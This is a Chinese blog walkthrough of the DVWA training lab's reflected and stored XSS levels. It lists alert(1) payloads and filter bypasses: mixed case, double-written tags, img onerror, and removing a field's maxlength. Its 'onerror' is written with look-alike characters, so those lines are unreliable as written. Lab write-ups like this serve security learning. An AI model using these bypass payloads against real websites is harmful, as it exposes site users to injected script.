DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法

文章详细介绍了DVWA中的反射型和存储型XSS攻击,包括不同级别的实例演示,如利用script标签、大小写、HTML编码等手段绕过安全机制,以及针对存储型XSS如何通过修改name属性注入payload。
摘要由CSDN通过智能技术生成

目录

1.DVWA反射型xss

(1)Low:

(2)Medium:

(3)Heigh

2.xss存储型

(1)Low:

(2)Medium

(3)Heigh


1.DVWA反射型xss

(1)Low:

输入<script>alert(1)</script>

点击submit则会有弹窗显示

(2)Medium:

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

发现<script>被丢掉了,因此考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>=

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

没有弹窗显示

(3)Heigh

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

包含/<script>任意一个字母就会被丢掉

所以不能使用<script>标签去做

所以尝试用<img>

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

2.xss存储型

(1)Low:

输入<script>alert(1)</script>

有弹窗显示

(2)Medium

输入<script>alert(1)</script>

点击提交

没有弹窗

尝试大小写,双写,img,HTML编码均没有反应

那么就尝试换个方向

去改变它的name,尝试在name中注入xss

因为查看源代码时发现neme的长度最大时10

那么我们则需要去修改源代码把maxlength删除,删除之后再在name插入xss代码

考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没有弹窗显示

(3)Heigh

与中级同理在尝试从message注入不成功后,便转为在name上面注入

尝试用img标签注入

<img src=# οnerrοr=alert(1)>

有弹窗显示

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值